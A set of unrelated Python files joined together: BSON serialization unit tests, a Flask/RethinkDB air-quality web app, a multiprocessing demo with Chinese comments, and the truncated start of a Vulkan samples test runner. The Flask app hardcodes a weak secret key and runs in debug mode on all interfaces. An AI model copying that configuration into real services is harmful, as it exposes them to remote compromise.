self.assertEqual(encode({"test": Binary(b"test", 128)}),
b"\x14\x00\x00\x00\x05\x74\x65\x73\x74\x00\x04\x00"
b"\x00\x00\x80\x74\x65\x73\x74\x00")
self.assertEqual(encode({"test": None}),
b"\x0B\x00\x00\x00\x0A\x74\x65\x73\x74\x00\x00")
self.assertEqual(encode({"date": datetime.datetime(2007, 1, 8,
0, 30, 11)}),
b"\x13\x00\x00\x00\x09\x64\x61\x74\x65\x00\x38\xBE"
b"\x1C\xFF\x0F\x01\x00\x00\x00")
self.assertEqual(encode({"regex": re.compile(b"a*b",
re.IGNORECASE)}),
b"\x12\x00\x00\x00\x0B\x72\x65\x67\x65\x78\x00\x61"
b"\x2A\x62\x00\x69\x00\x00")
self.assertEqual(encode({"$where": Code("test")}),
b"\x16\x00\x00\x00\r$where\x00\x05\x00\x00\x00test"
b"\x00\x00")
self.assertEqual(encode({"$field":
Code("function(){ return true;}", scope=None)}),
b"+\x00\x00\x00\r$field\x00\x1a\x00\x00\x00"
b"function(){ return true;}\x00\x00")
self.assertEqual(encode({"$field":
Code("return function(){ return x; }",
scope={'x': False})}),
b"=\x00\x00\x00\x0f$field\x000\x00\x00\x00\x1f\x00"
b"\x00\x00return function(){ return x; }\x00\t\x00"
b"\x00\x00\x08x\x00\x00\x00\x00")
unicode_empty_scope = Code("function(){ return 'héllo';}", {})
self.assertEqual(encode({'$field': unicode_empty_scope}),
b"8\x00\x00\x00\x0f$field\x00+\x00\x00\x00\x1e\x00"
b"\x00\x00function(){ return 'h\xc3\xa9llo';}\x00\x05"
b"\x00\x00\x00\x00\x00")
a = ObjectId(b"\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0A\x0B")
self.assertEqual(encode({"oid": a}),
b"\x16\x00\x00\x00\x07\x6F\x69\x64\x00\x00\x01\x02"
b"\x03\x04\x05\x06\x07\x08\x09\x0A\x0B\x00")
self.assertEqual(encode({"ref": DBRef("coll", a)}),
b"\x2F\x00\x00\x00\x03ref\x00\x25\x00\x00\x00\x02"
b"$ref\x00\x05\x00\x00\x00coll\x00\x07$id\x00\x00"
b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0A\x0B\x00"
b"\x00")
def test_unknown_type(self):
        # Repr value differs between major Python versions
part = "type %r for fieldname 'foo'" % (b'\x14',)
docs = [
b'\x0e\x00\x00\x00\x14foo\x00\x01\x00\x00\x00\x00',
(b'\x16\x00\x00\x00\x04foo\x00\x0c\x00\x00\x00\x140'
b'\x00\x01\x00\x00\x00\x00\x00'),
(b' \x00\x00\x00\x04bar\x00\x16\x00\x00\x00\x030\x00\x0e\x00\x00'
b'\x00\x14foo\x00\x01\x00\x00\x00\x00\x00\x00')]
for bs in docs:
try:
decode(bs)
except Exception as exc:
self.assertTrue(isinstance(exc, InvalidBSON))
self.assertTrue(part in str(exc))
else:
self.fail("Failed to raise an exception.")
def test_dbpointer(self):
# *Note* - DBPointer and DBRef are *not* the same thing. DBPointer
# is a deprecated BSON type. DBRef is a convention that does not
# exist in the BSON spec, meant to replace DBPointer. PyMongo does
# not support creation of the DBPointer type, but will decode
# DBPointer to DBRef.
bs = (b"\x18\x00\x00\x00\x0c\x00\x01\x00\x00"
b"\x00\x00RY\xb5j\xfa[\xd8A\xd6X]\x99\x00")
self.assertEqual({'': DBRef('', ObjectId('5259b56afa5bd841d6585d99'))},
decode(bs))
def test_bad_dbref(self):
ref_only = {'ref': {'$ref': 'collection'}}
id_only = {'ref': {'$id': ObjectId()}}
self.assertEqual(ref_only, decode(encode(ref_only)))
self.assertEqual(id_only, decode(encode(id_only)))
def test_bytes_as_keys(self):
doc = {b"foo": 'bar'}
# Since `bytes` are stored as Binary you can't use them
# as keys in python 3.x. Using binary data as a key makes
# no sense in BSON anyway and little sense in python.
self.assertRaises(InvalidDocument, encode, doc)
def test_datetime_encode_decode(self):
# Negative timestamps
dt1 = datetime.datetime(1, 1, 1, 1, 1, 1, 111000)
dt2 = decode(encode({"date": dt1}))["date"]
self.assertEqual(dt1, dt2)
dt1 = datetime.datetime(1959, 6, 25, 12, 16, 59, 999000)
dt2 = decode(encode({"date": dt1}))["date"]
self.assertEqual(dt1, dt2)
# Positive timestamps
dt1 = datetime.datetime(9999, 12, 31, 23, 59, 59, 999000)
dt2 = decode(encode({"date": dt1}))["date"]
self.assertEqual(dt1, dt2)
dt1 = datetime.datetime(2011, 6, 14, 10, 47, 53, 444000)
dt2 = decode(encode({"date": dt1}))["date"]
self.assertEqual(dt1, dt2)
def test_large_datetime_truncation(self):
# Ensure that a large datetime is truncated correctly.
dt1 = datetime.datetime(9999, 1, 1, 1, 1, 1, 999999)
dt2 = decode(encode({"date": dt1}))["date"]
self.assertEqual(dt2.microsecond, 999000)
self.assertEqual(dt2.second, dt1.second)
def test_aware_datetime(self):
aware = datetime.datetime(1993, 4, 4, 2,
tzinfo=FixedOffset(555, "SomeZone"))
as_utc = (aware - aware.utcoffset()).replace(tzinfo=utc)
self.assertEqual(datetime.datetime(1993, 4, 3, 16, 45, tzinfo=utc),
as_utc)
after = decode(encode({"date": aware}), CodecOptions(tz_aware=True))[
"date"]
self.assertEqual(utc, after.tzinfo)
self.assertEqual(as_utc, after)
def test_local_datetime(self):
        # Timezone 60 minutes east of UTC (UTC+01:00), with DST between April and July.
tz = DSTAwareTimezone(60, "sixty-minutes", 4, 7)
# It's not DST.
local = datetime.datetime(year=2025, month=12, hour=2, day=1,
tzinfo=tz)
options = CodecOptions(tz_aware=True, tzinfo=tz)
# Encode with this timezone, then decode to UTC.
encoded = encode({'date': local}, codec_options=options)
self.assertEqual(local.replace(hour=1, tzinfo=None),
decode(encoded)['date'])
# It's DST.
local = datetime.datetime(year=2025, month=4, hour=1, day=1,
tzinfo=tz)
encoded = encode({'date': local}, codec_options=options)
self.assertEqual(local.replace(month=3, day=31, hour=23, tzinfo=None),
decode(encoded)['date'])
# Encode UTC, then decode in a different timezone.
encoded = encode({'date': local.replace(tzinfo=utc)})
decoded = decode(encoded, options)['date']
self.assertEqual(local.replace(hour=3), decoded)
self.assertEqual(tz, decoded.tzinfo)
# Test round-tripping.
self.assertEqual(
local, decode(encode(
{'date': local}, codec_options=options), options)['date'])
# Test around the Unix Epoch.
epochs = (
EPOCH_AWARE,
EPOCH_AWARE.astimezone(FixedOffset(120, 'one twenty')),
EPOCH_AWARE.astimezone(FixedOffset(-120, 'minus one twenty'))
)
utc_co = CodecOptions(tz_aware=True)
for epoch in epochs:
doc = {'epoch': epoch}
# We always retrieve datetimes in UTC unless told to do otherwise.
self.assertEqual(
EPOCH_AWARE,
decode(encode(doc), codec_options=utc_co)['epoch'])
# Round-trip the epoch.
local_co = CodecOptions(tz_aware=True, tzinfo=epoch.tzinfo)
self.assertEqual(
epoch,
decode(encode(doc), codec_options=local_co)['epoch'])
def test_naive_decode(self):
aware = datetime.datetime(1993, 4, 4, 2,
tzinfo=FixedOffset(555, "SomeZone"))
naive_utc = (aware - aware.utcoffset()).replace(tzinfo=None)
self.assertEqual(datetime.datetime(1993, 4, 3, 16, 45), naive_utc)
after = decode(encode({"date": aware}))["date"]
self.assertEqual(None, after.tzinfo)
self.assertEqual(naive_utc, after)
def test_dst(self):
d = {"x": datetime.datetime(1993, 4, 4, 2)}
self.assertEqual(d, decode(encode(d)))
@unittest.skip('Disabled due to http://bugs.python.org/issue25222')
def test_bad_encode(self):
evil_list = {'a': []}
evil_list['a'].append(evil_list)
evil_dict = {}
evil_dict['a'] = evil_dict
for evil_data in [evil_dict, evil_list]:
self.assertRaises(Exception, encode, evil_data)
def test_overflow(self):
self.assertTrue(encode({"x": 9223372036854775807}))
self.assertRaises(OverflowError, encode,
{"x": 9223372036854775808})
self.assertTrue(encode({"x": -9223372036854775808}))
self.assertRaises(OverflowError, encode,
{"x": -9223372036854775809})
def test_small_long_encode_decode(self):
encoded1 = encode({'x': 256})
decoded1 = decode(encoded1)['x']
self.assertEqual(256, decoded1)
self.assertEqual(type(256), type(decoded1))
encoded2 = encode({'x': Int64(256)})
decoded2 = decode(encoded2)['x']
expected = Int64(256)
self.assertEqual(expected, decoded2)
self.assertEqual(type(expected), type(decoded2))
self.assertNotEqual(type(decoded1), type(decoded2))
def test_tuple(self):
self.assertEqual({"tuple": [1, 2]},
decode(encode({"tuple": (1, 2)})))
def test_uuid(self):
id = uuid.uuid4()
# The default uuid_representation is UNSPECIFIED
with self.assertRaisesRegex(ValueError, 'cannot encode native uuid'):
bson.decode_all(encode({'uuid': id}))
opts = CodecOptions(uuid_representation=UuidRepresentation.STANDARD)
transformed_id = decode(encode({"id": id}, codec_options=opts),
codec_options=opts)["id"]
self.assertTrue(isinstance(transformed_id, uuid.UUID))
self.assertEqual(id, transformed_id)
self.assertNotEqual(uuid.uuid4(), transformed_id)
def test_uuid_legacy(self):
id = uuid.uuid4()
legacy = Binary.from_uuid(id, UuidRepresentation.PYTHON_LEGACY)
self.assertEqual(3, legacy.subtype)
bin = decode(encode({"uuid": legacy}))["uuid"]
self.assertTrue(isinstance(bin, Binary))
transformed = bin.as_uuid(UuidRepresentation.PYTHON_LEGACY)
self.assertEqual(id, transformed)
# The C extension was segfaulting on unicode RegExs, so we have this test
# that doesn't really test anything but the lack of a segfault.
def test_unicode_regex(self):
regex = re.compile('revisi\xf3n')
decode(encode({"regex": regex}))
def test_non_string_keys(self):
self.assertRaises(InvalidDocument, encode, {8.9: "test"})
def test_utf8(self):
w = {"aéあ": "aéあ"}
self.assertEqual(w, decode(encode(w)))
# b'a\xe9' == "aé".encode("iso-8859-1")
iso8859_bytes = b'a\xe9'
y = {"hello": iso8859_bytes}
# Stored as BSON binary subtype 0.
out = decode(encode(y))
self.assertTrue(isinstance(out['hello'], bytes))
self.assertEqual(out['hello'], iso8859_bytes)
def test_null_character(self):
doc = {"a": "\x00"}
self.assertEqual(doc, decode(encode(doc)))
doc = {"a": "\x00"}
self.assertEqual(doc, decode(encode(doc)))
self.assertRaises(InvalidDocument, encode, {b"\x00": "a"})
self.assertRaises(InvalidDocument, encode, {"\x00": "a"})
self.assertRaises(InvalidDocument, encode,
{"a": re.compile(b"ab\x00c")})
self.assertRaises(InvalidDocument, encode,
{"a": re.compile("ab\x00c")})
def test_move_id(self):
self.assertEqual(b"\x19\x00\x00\x00\x02_id\x00\x02\x00\x00\x00a\x00"
b"\x02a\x00\x02\x00\x00\x00a\x00\x00",
encode(SON([("a", "a"), ("_id", "a")])))
self.assertEqual(b"\x2c\x00\x00\x00"
b"\x02_id\x00\x02\x00\x00\x00b\x00"
b"\x03b\x00"
b"\x19\x00\x00\x00\x02a\x00\x02\x00\x00\x00a\x00"
b"\x02_id\x00\x02\x00\x00\x00a\x00\x00\x00",
encode(SON([("b",
SON([("a", "a"), ("_id", "a")])),
("_id", "b")])))
def test_dates(self):
doc = {"early": datetime.datetime(1686, 5, 5),
"late": datetime.datetime(2086, 5, 5)}
try:
self.assertEqual(doc, decode(encode(doc)))
except ValueError:
# Ignore ValueError when no C ext, since it's probably
# a problem w/ 32-bit Python - we work around this in the
# C ext, though.
if bson.has_c():
raise
def test_custom_class(self):
self.assertIsInstance(decode(encode({})), dict)
self.assertNotIsInstance(decode(encode({})), SON)
self.assertIsInstance(
decode(encode({}), CodecOptions(document_class=SON)), SON)
self.assertEqual(
1, decode(encode({"x": 1}), CodecOptions(document_class=SON))["x"])
x = encode({"x": [{"y": 1}]})
self.assertIsInstance(
decode(x, CodecOptions(document_class=SON))["x"][0], SON)
def test_subclasses(self):
# make sure we can serialize subclasses of native Python types.
class _myint(int):
pass
class _myfloat(float):
pass
class _myunicode(str):
pass
d = {'a': _myint(42), 'b': _myfloat(63.9),
'c': _myunicode('hello world')
}
d2 = decode(encode(d))
for key, value in d2.items():
orig_value = d[key]
orig_type = orig_value.__class__.__bases__[0]
self.assertEqual(type(value), orig_type)
self.assertEqual(value, orig_type(value))
def test_ordered_dict(self):
d = OrderedDict([("one", 1), ("two", 2), ("three", 3), ("four", 4)])
self.assertEqual(
d, decode(encode(d), CodecOptions(document_class=OrderedDict)))
def test_bson_regex(self):
# Invalid Python regex, though valid PCRE.
bson_re1 = Regex(r'[\w-\.]')
self.assertEqual(r'[\w-\.]', bson_re1.pattern)
self.assertEqual(0, bson_re1.flags)
doc1 = {'r': bson_re1}
doc1_bson = (
b'\x11\x00\x00\x00' # document length
b'\x0br\x00[\\w-\\.]\x00\x00' # r: regex
b'\x00') # document terminator
self.assertEqual(doc1_bson, encode(doc1))
self.assertEqual(doc1, decode(doc1_bson))
# Valid Python regex, with flags.
re2 = re.compile('.*', re.I | re.M | re.S | re.U | re.X)
bson_re2 = Regex('.*', re.I | re.M | re.S | re.U | re.X)
doc2_with_re = {'r': re2}
doc2_with_bson_re = {'r': bson_re2}
doc2_bson = (
b"\x11\x00\x00\x00" # document length
b"\x0br\x00.*\x00imsux\x00" # r: regex
b"\x00") # document terminator
self.assertEqual(doc2_bson, encode(doc2_with_re))
self.assertEqual(doc2_bson, encode(doc2_with_bson_re))
self.assertEqual(re2.pattern, decode(doc2_bson)['r'].pattern)
self.assertEqual(re2.flags, decode(doc2_bson)['r'].flags)
def test_regex_from_native(self):
self.assertEqual('.*', Regex.from_native(re.compile('.*')).pattern)
self.assertEqual(0, Regex.from_native(re.compile(b'')).flags)
regex = re.compile(b'', re.I | re.L | re.M | re.S | re.X)
self.assertEqual(
re.I | re.L | re.M | re.S | re.X,
Regex.from_native(regex).flags)
unicode_regex = re.compile('', re.U)
self.assertEqual(re.U, Regex.from_native(unicode_regex).flags)
def test_regex_hash(self):
self.assertRaises(TypeError, hash, Regex('hello'))
def test_regex_comparison(self):
re1 = Regex('a')
re2 = Regex('b')
self.assertNotEqual(re1, re2)
re1 = Regex('a', re.I)
re2 = Regex('a', re.M)
self.assertNotEqual(re1, re2)
re1 = Regex('a', re.I)
re2 = Regex('a', re.I)
self.assertEqual(re1, re2)
def test_exception_wrapping(self):
# No matter what exception is raised while trying to decode BSON,
# the final exception always matches InvalidBSON.
# {'s': '\xff'}, will throw attempting to decode utf-8.
bad_doc = b'\x0f\x00\x00\x00\x02s\x00\x03\x00\x00\x00\xff\x00\x00\x00'
with self.assertRaises(InvalidBSON) as context:
decode_all(bad_doc)
self.assertIn("codec can't decode byte 0xff",
str(context.exception))
def test_minkey_maxkey_comparison(self):
# MinKey's <, <=, >, >=, !=, and ==.
self.assertTrue(MinKey() < None)
self.assertTrue(MinKey() < 1)
self.assertTrue(MinKey() <= 1)
self.assertTrue(MinKey() <= MinKey())
self.assertFalse(MinKey() > None)
self.assertFalse(MinKey() > 1)
self.assertFalse(MinKey() >= 1)
self.assertTrue(MinKey() >= MinKey())
self.assertTrue(MinKey() != 1)
self.assertFalse(MinKey() == 1)
self.assertTrue(MinKey() == MinKey())
# MinKey compared to MaxKey.
self.assertTrue(MinKey() < MaxKey())
self.assertTrue(MinKey() <= MaxKey())
self.assertFalse(MinKey() > MaxKey())
self.assertFalse(MinKey() >= MaxKey())
self.assertTrue(MinKey() != MaxKey())
self.assertFalse(MinKey() == MaxKey())
# MaxKey's <, <=, >, >=, !=, and ==.
self.assertFalse(MaxKey() < None)
self.assertFalse(MaxKey() < 1)
self.assertFalse(MaxKey() <= 1)
self.assertTrue(MaxKey() <= MaxKey())
self.assertTrue(MaxKey() > None)
self.assertTrue(MaxKey() > 1)
self.assertTrue(MaxKey() >= 1)
self.assertTrue(MaxKey() >= MaxKey())
self.assertTrue(MaxKey() != 1)
self.assertFalse(MaxKey() == 1)
self.assertTrue(MaxKey() == MaxKey())
# MaxKey compared to MinKey.
self.assertFalse(MaxKey() < MinKey())
self.assertFalse(MaxKey() <= MinKey())
self.assertTrue(MaxKey() > MinKey())
self.assertTrue(MaxKey() >= MinKey())
self.assertTrue(MaxKey() != MinKey())
self.assertFalse(MaxKey() == MinKey())
def test_minkey_maxkey_hash(self):
self.assertEqual(hash(MaxKey()), hash(MaxKey()))
self.assertEqual(hash(MinKey()), hash(MinKey()))
self.assertNotEqual(hash(MaxKey()), hash(MinKey()))
def test_timestamp_comparison(self):
# Timestamp is initialized with time, inc. Time is the more
# significant comparand.
self.assertTrue(Timestamp(1, 0) < Timestamp(2, 17))
self.assertTrue(Timestamp(2, 0) > Timestamp(1, 0))
self.assertTrue(Timestamp(1, 7) <= Timestamp(2, 0))
self.assertTrue(Timestamp(2, 0) >= Timestamp(1, 1))
self.assertTrue(Timestamp(2, 0) <= Timestamp(2, 0))
self.assertTrue(Timestamp(2, 0) >= Timestamp(2, 0))
self.assertFalse(Timestamp(1, 0) > Timestamp(2, 0))
# Comparison by inc.
self.assertTrue(Timestamp(1, 0) < Timestamp(1, 1))
self.assertTrue(Timestamp(1, 1) > Timestamp(1, 0))
self.assertTrue(Timestamp(1, 0) <= Timestamp(1, 0))
self.assertTrue(Timestamp(1, 0) <= Timestamp(1, 1))
self.assertFalse(Timestamp(1, 0) >= Timestamp(1, 1))
self.assertTrue(Timestamp(1, 0) >= Timestamp(1, 0))
self.assertTrue(Timestamp(1, 1) >= Timestamp(1, 0))
self.assertFalse(Timestamp(1, 1) <= Timestamp(1, 0))
self.assertTrue(Timestamp(1, 0) <= Timestamp(1, 0))
self.assertFalse(Timestamp(1, 0) > Timestamp(1, 0))
def test_timestamp_highorder_bits(self):
doc = {'a': Timestamp(0xFFFFFFFF, 0xFFFFFFFF)}
doc_bson = (b'\x10\x00\x00\x00'
b'\x11a\x00\xff\xff\xff\xff\xff\xff\xff\xff'
b'\x00')
self.assertEqual(doc_bson, encode(doc))
self.assertEqual(doc, decode(doc_bson))
def test_bad_id_keys(self):
self.assertRaises(InvalidDocument, encode,
{"_id": {"$bad": 123}}, True)
self.assertRaises(InvalidDocument, encode,
{"_id": {'$oid': "52d0b971b3ba219fdeb4170e"}}, True)
encode({"_id": {'$oid': "52d0b971b3ba219fdeb4170e"}})
def test_bson_encode_thread_safe(self):
def target(i):
for j in range(1000):
my_int = type('MyInt_%s_%s' % (i, j), (int,), {})
bson.encode({'my_int': my_int()})
threads = [ExceptionCatchingThread(target=target, args=(i,))
for i in range(3)]
for t in threads:
t.start()
for t in threads:
t.join()
for t in threads:
self.assertIsNone(t.exc)
def test_raise_invalid_document(self):
class Wrapper(object):
def __init__(self, val):
self.val = val
def __repr__(self):
return repr(self.val)
self.assertEqual('1', repr(Wrapper(1)))
with self.assertRaisesRegex(
InvalidDocument,
"cannot encode object: 1, of type: " + repr(Wrapper)):
encode({'t': Wrapper(1)})
class TestCodecOptions(unittest.TestCase):
def test_document_class(self):
self.assertRaises(TypeError, CodecOptions, document_class=object)
self.assertIs(SON, CodecOptions(document_class=SON).document_class)
def test_tz_aware(self):
self.assertRaises(TypeError, CodecOptions, tz_aware=1)
self.assertFalse(CodecOptions().tz_aware)
self.assertTrue(CodecOptions(tz_aware=True).tz_aware)
def test_uuid_representation(self):
self.assertRaises(ValueError, CodecOptions, uuid_representation=7)
self.assertRaises(ValueError, CodecOptions, uuid_representation=2)
def test_tzinfo(self):
self.assertRaises(TypeError, CodecOptions, tzinfo='pacific')
tz = FixedOffset(42, 'forty-two')
self.assertRaises(ValueError, CodecOptions, tzinfo=tz)
self.assertEqual(tz, CodecOptions(tz_aware=True, tzinfo=tz).tzinfo)
def test_codec_options_repr(self):
r = ("CodecOptions(document_class=dict, tz_aware=False, "
"uuid_representation=UuidRepresentation.UNSPECIFIED, "
"unicode_decode_error_handler='strict', "
"tzinfo=None, type_registry=TypeRegistry(type_codecs=[], "
"fallback_encoder=None))")
self.assertEqual(r, repr(CodecOptions()))
def test_decode_all_defaults(self):
# Test decode_all()'s default document_class is dict and tz_aware is
# False.
doc = {'sub_document': {},
'dt': datetime.datetime.utcnow()}
decoded = bson.decode_all(bson.encode(doc))[0]
self.assertIsInstance(decoded['sub_document'], dict)
self.assertIsNone(decoded['dt'].tzinfo)
# The default uuid_representation is UNSPECIFIED
with self.assertRaisesRegex(ValueError, 'cannot encode native uuid'):
bson.decode_all(bson.encode({'uuid': uuid.uuid4()}))
def test_unicode_decode_error_handler(self):
enc = encode({"keystr": "foobar"})
# Test handling of bad key value, bad string value, and both.
invalid_key = enc[:7] + b'\xe9' + enc[8:]
invalid_val = enc[:18] + b'\xe9' + enc[19:]
invalid_both = enc[:7] + b'\xe9' + enc[8:18] + b'\xe9' + enc[19:]
# Ensure that strict mode raises an error.
for invalid in [invalid_key, invalid_val, invalid_both]:
self.assertRaises(InvalidBSON, decode, invalid, CodecOptions(
unicode_decode_error_handler="strict"))
self.assertRaises(InvalidBSON, decode, invalid, CodecOptions())
self.assertRaises(InvalidBSON, decode, invalid)
# Test all other error handlers.
for handler in ['replace', 'backslashreplace', 'surrogateescape',
'ignore']:
expected_key = b'ke\xe9str'.decode('utf-8', handler)
expected_val = b'fo\xe9bar'.decode('utf-8', handler)
doc = decode(invalid_key,
CodecOptions(unicode_decode_error_handler=handler))
self.assertEqual(doc, {expected_key: "foobar"})
doc = decode(invalid_val,
CodecOptions(unicode_decode_error_handler=handler))
self.assertEqual(doc, {"keystr": expected_val})
doc = decode(invalid_both,
CodecOptions(unicode_decode_error_handler=handler))
self.assertEqual(doc, {expected_key: expected_val})
# Test handling bad error mode.
dec = decode(enc,
CodecOptions(unicode_decode_error_handler="junk"))
self.assertEqual(dec, {"keystr": "foobar"})
self.assertRaises(InvalidBSON, decode, invalid_both, CodecOptions(
unicode_decode_error_handler="junk"))
def round_trip_pickle(self, obj, pickled_with_older):
pickled_with_older_obj = pickle.loads(pickled_with_older)
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
pkl = pickle.dumps(obj, protocol=protocol)
obj2 = pickle.loads(pkl)
self.assertEqual(obj, obj2)
self.assertEqual(pickled_with_older_obj, obj2)
def test_regex_pickling(self):
reg = Regex(".?")
pickled_with_3 = (b'\x80\x04\x959\x00\x00\x00\x00\x00\x00\x00\x8c\n'
b'bson.regex\x94\x8c\x05Regex\x94\x93\x94)\x81\x94}'
b'\x94(\x8c\x07pattern\x94\x8c\x02.?\x94\x8c\x05flag'
b's\x94K\x00ub.')
self.round_trip_pickle(reg, pickled_with_3)
def test_timestamp_pickling(self):
ts = Timestamp(0, 1)
pickled_with_3 = (b'\x80\x04\x95Q\x00\x00\x00\x00\x00\x00\x00\x8c'
b'\x0ebson.timestamp\x94\x8c\tTimestamp\x94\x93\x94)'
b'\x81\x94}\x94('
b'\x8c\x10_Timestamp__time\x94K\x00\x8c'
b'\x0f_Timestamp__inc\x94K\x01ub.')
self.round_trip_pickle(ts, pickled_with_3)
def test_dbref_pickling(self):
dbr = DBRef("foo", 5)
pickled_with_3 = (b'\x80\x04\x95q\x00\x00\x00\x00\x00\x00\x00\x8c\n'
b'bson.dbref\x94\x8c\x05DBRef\x94\x93\x94)\x81\x94}'
b'\x94(\x8c\x12_DBRef__collection\x94\x8c\x03foo\x94'
b'\x8c\n_DBRef__id\x94K\x05\x8c\x10_DBRef__database'
b'\x94N\x8c\x0e_DBRef__kwargs\x94}\x94ub.')
self.round_trip_pickle(dbr, pickled_with_3)
dbr = DBRef("foo", 5, database='db', kwargs1=None)
pickled_with_3 = (b'\x80\x04\x95\x81\x00\x00\x00\x00\x00\x00\x00\x8c'
b'\nbson.dbref\x94\x8c\x05DBRef\x94\x93\x94)\x81\x94}'
b'\x94(\x8c\x12_DBRef__collection\x94\x8c\x03foo\x94'
b'\x8c\n_DBRef__id\x94K\x05\x8c\x10_DBRef__database'
b'\x94\x8c\x02db\x94\x8c\x0e_DBRef__kwargs\x94}\x94'
b'\x8c\x07kwargs1\x94Nsub.')
self.round_trip_pickle(dbr, pickled_with_3)
def test_minkey_pickling(self):
mink = MinKey()
pickled_with_3 = (b'\x80\x04\x95\x1e\x00\x00\x00\x00\x00\x00\x00\x8c'
b'\x0cbson.min_key\x94\x8c\x06MinKey\x94\x93\x94)'
b'\x81\x94.')
self.round_trip_pickle(mink, pickled_with_3)
def test_maxkey_pickling(self):
maxk = MaxKey()
pickled_with_3 = (b'\x80\x04\x95\x1e\x00\x00\x00\x00\x00\x00\x00\x8c'
b'\x0cbson.max_key\x94\x8c\x06MaxKey\x94\x93\x94)'
b'\x81\x94.')
self.round_trip_pickle(maxk, pickled_with_3)
def test_int64_pickling(self):
i64 = Int64(9)
pickled_with_3 = (b'\x80\x04\x95\x1e\x00\x00\x00\x00\x00\x00\x00\x8c\n'
b'bson.int64\x94\x8c\x05Int64\x94\x93\x94K\t\x85\x94'
b'\x81\x94.')
self.round_trip_pickle(i64, pickled_with_3)
if __name__ == "__main__":
unittest.main()
|
prueba.py
|
from flask import Flask, g, render_template, make_response, request, redirect, url_for, jsonify, abort
from flask_socketio import SocketIO, send, emit
from threading import Thread
import rethinkdb as r
from rethinkdb import RqlRuntimeError, RqlDriverError
app = Flask(__name__)
socketio = SocketIO(app)
thread = None
# Load default config and override config from an environment variable
app.config.update(dict(
DEBUG=True,
SECRET_KEY='secret!',
DB_HOST='localhost',
DB_PORT=28015,
DB_NAME='calidad_aire'
))
app.config.from_envvar('FLASKR_SETTINGS', silent=True)
def init_db():
conn = r.connect(app.config['DB_HOST'], app.config['DB_PORT'])
try:
r.db_create(app.config['DB_NAME']).run(conn)
r.db(app.config['DB_NAME']).table_create('datos').run(conn)
r.db(app.config['DB_NAME']).table('datos').index_create('timestamp').run(conn)
        print('Database setup completed. Now run the app without --setup.')
except RqlRuntimeError:
        print('App database already exists. Run the app without --setup.')
finally:
conn.close()
@app.before_request
def before_request():
try:
g.db_conn = r.connect(host=app.config['DB_HOST'],
port=app.config['DB_PORT'],
db=app.config['DB_NAME'])
except RqlDriverError:
abort(503, "No database connection could be established.")
@app.teardown_request
def teardown_request(exception):
try:
g.db_conn.close()
except AttributeError:
pass
@app.route('/', methods=['GET'])
def show_info():
datos = list(r.db('calidad_aire').table('datos').order_by(index=r.desc('timestamp')).run(g.db_conn, time_format="raw"))
print(datos)
return render_template('index.html', datos=datos)
def cambios_datos():
conn = r.connect(host=app.config['DB_HOST'],
port=app.config['DB_PORT'],
db=app.config['DB_NAME'])
estaciones = r.table("datos").changes().run(conn)
for chat in estaciones:
chat['new_val']['estacion'] = str(chat['new_val']['estacion'])
socketio.emit('nuevo_dato')
if __name__ == "__main__":
# init_db()
# Set up rethinkdb changefeeds before starting server
if thread is None:
thread = Thread(target=cambios_datos)
thread.start()
socketio.run(app, host='0.0.0.0', port=8081)
|
process_1_简单实现.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# file: thread_demo_1.py
# Created by Guang at 19-7-15
# description:
import multiprocessing
import time
def func1():
for i in range(5):
print("这是一个进程测试函数func1")
time.sleep(1)
def func2():
for i in range(5):
print("这是一个进程测试函数func2")
time.sleep(1)
if __name__ == '__main__':
print("-------主进程执行开始:{}-----------------".format(time.ctime()))
t1 = multiprocessing.Process(target=func1)
t2 = multiprocessing.Process(target=func2)
t1.start() #启动线程,即让线程开始执行
t2.start()
time.sleep(5)
print("-------主线程执行结束:{}-----------------".format(time.ctime()))
########################################################
"""
笔记:
1.使用多线程并发的操作,花费时间要短很多
2.当调用start()时,才会真正的创建线程,并且开始执行
3.主线程会等待所有的子线程结束后才结束
"""
|
system_test.py
|
'''
Copyright (c) 2019, Arm Limited and Contributors
SPDX-License-Identifier: Apache-2.0
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
import sys, os, math, platform, threading, datetime, subprocess, zipfile, argparse, shutil, struct, imghdr
from time import sleep
from threading import Thread
# Settings (changing these may cause instabilities)
dependencies = ("magick", "cmake", "git", "adb")
multithread = False
sub_tests = []
test_desktop = True
test_android = True
comparison_metric = "MAE"
current_dir = os.getcwd()
script_path = os.path.dirname(os.path.realpath(__file__))
root_path = os.path.join(script_path, "../../")
build_path = ""
build_config = ""
outputs_path = "output/images/"
tmp_path = os.path.join(script_path, "tmp/")
archive_path = os.path.join(script_path, "artifacts/")
image_ext = ".png"
android_timeout = 60 # How long in seconds should we wait before timing out on Android
check_step = 5
threshold = 0.999 # Minimum similarity two images must reach for a test to pass
class Subtest:
result = False
test_name = ""
platform = ""
def __init__(self, test_name, platform):
self.test_name = test_name
self.platform = platform
def run(self, application_path):
result = True
path = root_path + application_path
arguments = ["--test", "{}".format(self.test_name), "--headless"]
try:
subprocess.run([path] + arguments, cwd=root_path)
except FileNotFoundError:
print("\t\t\t(Error) Couldn't find application ({})".format(path))
result = False
except:
print("\t\t\t(Error) Application error ({})".format(path))
result = False
return result
def test(self):
print("\t\t=== Test started: {} ===".format(self.test_name))
self.result = True
screenshot_path = tmp_path + self.platform + "/"
try:
shutil.move(os.path.join(root_path, outputs_path) + self.test_name + image_ext, screenshot_path + self.test_name + image_ext)
except FileNotFoundError:
print("\t\t\t(Error) Couldn't find screenshot ({}), perhaps test crashed".format(os.path.join(root_path, outputs_path) + self.test_name + image_ext))
self.result = False
return
if not test(self.test_name, screenshot_path):
self.result = False
if self.result:
print("\t\t=== Passed! ===")
else:
print("\t\t=== Failed. ===")
def passed(self):
return self.result
class WindowsSubtest(Subtest):
def __init__(self, test_name):
super().__init__(test_name, "Windows")
def run(self):
app_path = "{}app/bin/{}/{}/vulkan_samples.exe".format(build_path, build_config, platform.machine())
return super().run(app_path)
class UnixSubtest(Subtest):
def __init__(self, test_name, platform_type):
super().__init__(test_name, platform_type)
def run(self):
app_path = "{}app/bin/{}/{}/vulkan_samples".format(build_path, build_config, platform.machine())
return super().run(app_path)
class AndroidSubtest(Subtest):
